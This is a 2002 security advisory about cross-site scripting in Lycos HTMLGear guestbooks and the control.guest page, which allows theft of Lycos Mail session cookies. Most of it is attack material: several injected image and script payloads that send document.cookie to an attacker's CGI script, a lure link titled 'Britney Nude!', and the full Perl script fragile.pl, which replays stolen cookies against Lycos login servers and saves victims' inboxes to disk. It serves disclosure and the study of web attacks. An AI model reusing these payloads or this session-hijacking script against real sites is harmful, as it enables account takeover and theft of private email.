lycosxss.txt

2002-11-06T00:00:00
ID PACKETSTORM:30042
Type packetstorm
Reporter NightHawk
Modified 2002-11-06T00:00:00

Description

                                        
                                            `----------------------------------------  
Lycos XSS/Cookie problems Advisory  
----------------------------------------  
  
Lycos XSS/Cookie problems  
05/11/02  
- by "N|ghtHawk" Thijs Bosschert (nighthawk_at_hackers4hackers.org)  
  
  
-------------------  
Vendor Information:  
-------------------  
  
Homepage : http://www.lycos.com  
Vendor informed  
About bug : -  
Mailed advisory: 01/11/02  
Vender Response : None (yet?)  
Version on site : control.guest still vulnerable for XSS  
Cookie capturing still possible  
  
Because of not answering in the past, I didn't wait  
long before making this advisory public.  
  
  
-------------------  
Affected Versions:  
-------------------  
  
Tested on:  
- Lycos.com Mail  
  
  
Not tested on:  
- Other Lycos services  
  
  
-------------------  
Description:  
-------------------  
  
What is lycos?  
-------------  
  
- http://login.mail.lycos.com/  
  
- Lycos Mail is a full featured web-based email solution.  
Lycos Mail now offers two levels of email service, a  
standard FREE version and a NEW Lycos Mail Plus option  
for the more demanding user.  
  
  
- http://htmlgear.lycos.com  
  
- Professional Gears!  
Professional Gears eliminate ALL ads and HTML Gear branding and  
give you the freedom to integrate Gears more seamlessly on your  
site. The result is a more professional-looking Gear that's  
perfect for business and personal sites. Here are just a few of  
the reasons why you should go pro . . .  
  
  
-------------------  
Vulnerability:  
-------------------  
  
'Matthew Murphy' found on Sept 14 2002 some bugs in the  
HTMLGear Guestbook, which can be viewed on:  
- http://online.securityfocus.com/archive/1/292131  
- http://online.securityfocus.com/bid/5728  
  
Besides those bugs, the HTMLGear got also a XSS in 'control.guest'  
on the lycos.com server. Both bugs can be used to get the cookies  
from users of the site.  
The real problem in this is that through this way people their  
lycosmail cookies can be captured. This can be done when people  
use the "Save User Name & Password" option when login in and don't  
log out. Closing the browser wil not log them out.  
With the cookie of a lycosmail user, people can have access to their  
mailbox.  
  
  
-------------------  
Exploit:  
-------------------  
  
Inject javascript into the htmlgear of none patched/bad filtered  
guestbooks:  
  
- <IMG SRC="javascript:window.open('http://host/cgi-bin/fragile.pl?  
'%2Bdocument.cookie);">  
- <IMG SRC="http://a.a/a" onerror="poof:window.open(  
'http://host/cgi-bin/fragile.pl?'+document.cookie);">  
- <IMG SRC="http://ly.lygo.com/ly/0/hp/dog.gif" onload="poof:  
window.open('http://host/cgi-bin/fragile.pl?'+document.cookie);">  
  
Or let people click on the next url:  
  
- http://htmlgear.lycos.com/guest/control.guest?u=poof&a=">  
<script>window.open('http://host/cgi-bin/fragile.pl?'%2B  
document.cookie)%3B</script>  
  
This can be done by letting people click on a link, which you can  
mail them:  
  
- <a href="http://htmlgear.lycos.com/guest/control.guest?u=poof&a=  
%22%3E%3Cscript%3Ewindow.open('http://host/cgi-bin/fragile.pl?'%25  
2Bdocument.cookie)%3C/script%3E">Britney Nude!</a>  
  
  
All will connect with a perl script (fragile.pl), this script will  
take the cookie, and make a connection to lycos.com to login on  
the mailserver using the cookie. Then it wil request the inbox or  
the frontpage of the mailbox of the user.  
With the third option in the exploit it just captures the cookies  
and write them in a file together with the emailaddress.  
This is just a proof of concept, you could also change it to let  
it read mail. Please don't email me with request to write  
that.  
  
-------------------  
Fragile.pl  
-------------------  
  
#!/usr/bin/perl -w  
#  
# Lycos.com XSS/Cookie Problems  
# N|ghtHawk  
# nighthawk_at_hackers4hackers.org  
  
use IO::Socket;  
  
# OPTIONS  
# 1. See Mail Frontpage  
# 2. See Inbox  
# 3. Only save Cookie  
$option = 2;  
  
# PATH  
$path = "/tmp/";  
  
$cookie = "$ENV{QUERY_STRING}\;";  
$cookie =~ s/%20/ /g;  
  
if ($cookie !~ "MAYA") {  
&no_cookie;  
}  
  
$ip = "209.202.220.97";  
$host = "login.mail.lycos.com";  
$req = "\/?callback\=http:\/\/inbox.mail.lycos.com\/jumpPage.shtml";  
  
$data = request($ip, $host, $req);  
  
@datar = split(/\n/,$data);  
foreach $line (@datar) {  
if ($line =~ /[Cc]ookie: *(.*)\; *.*\;/) {  
$line = $1;  
if ($line !~ "L_LOC") {  
$cookie .= " $line\;";  
} else {  
$cookie .= " $line";  
}  
} elsif ($line =~ /Location: *http\:\/\/inbox.mail.lycos.com(.*)/) {  
$req = $1;  
}  
}  
  
if ($option == 1 || $option == 3) {  
$ip = "209.202.220.100";  
$host = "inbox.mail.lycos.com";  
$data = request($ip, $host, $req);  
out($data);  
}  
  
if ($option == 2) {  
$ip = "209.202.220.97";  
$host = "login.mail.lycos.com";  
$req = "\/bounce.shtml?goto=folder&folderId=!1inbox&user=&count=1";  
$data = request($ip, $host, $req);  
@datar = split(/\n/,$data);  
foreach $line (@datar) {  
if ($line =~ /Location: *http:\/\/(.*com)(\/.*)/) {  
$host = $1;  
$req = $2;  
}  
}  
$data = request($host,$host,$req);  
out($data);  
}  
  
sub out {  
my ($data) = @_;  
@datar = split(/\n/,$data);  
foreach $line (@datar) {  
if ($line =~ /<b>Hello, * (.+\@lycos.com)<\/b>/) {  
$name = $1;  
}  
}  
if ($option == 3) {  
$data = "$name\n$cookie\n";  
$name = "cookies";  
}  
open(FILE,">$path$name.html");  
print FILE "$data\n";  
close(FILE);  
  
print "Content-type: text/html\n";  
print "Location: http://www.dwheeler.com/secure-programs".  
"/Secure-Programs-HOWTO.html\n\n";  
}  
  
sub request {  
my ($ip, $host, $req) = @_;  
$sock = IO::Socket::INET->new(  
Proto => "tcp",  
PeerAddr => "$ip",  
PeerPort => "80",  
Timeout => 30) || die "Could not create socket: $!\n";  
print $sock "GET $req HTTP/1.0\n".  
"Host: $host\n".  
"Accept: image/gif, image/x-xbitmap, */*\n".  
"Accept-Language: nl\n".  
"User-Agent: Pr00fOfConcept/1.0 \n".  
"Connection: Keep-Alive\n".  
"Cookie: $cookie\n\n";  
sleep(2);  
recv($sock,$data,200000,0);  
close($sock);  
return $data;  
}  
  
sub no_cookie {  
print "content-type: text/html\n\n";  
print "<h1>No Lycos Mail Cookie found</h1>\n";  
exit;  
}  
  
  
-------------------  
Patch:  
-------------------  
  
Well, it's up to Lycos to patch this. It would be a good idea  
not to put insecure scripts on a server which uses the same  
cookies as your mailsystem.  
  
  
-------------------  
Thanks:  
-------------------  
  
Wim, Digiover, Asby  
  
-------------------  
  
  
  
`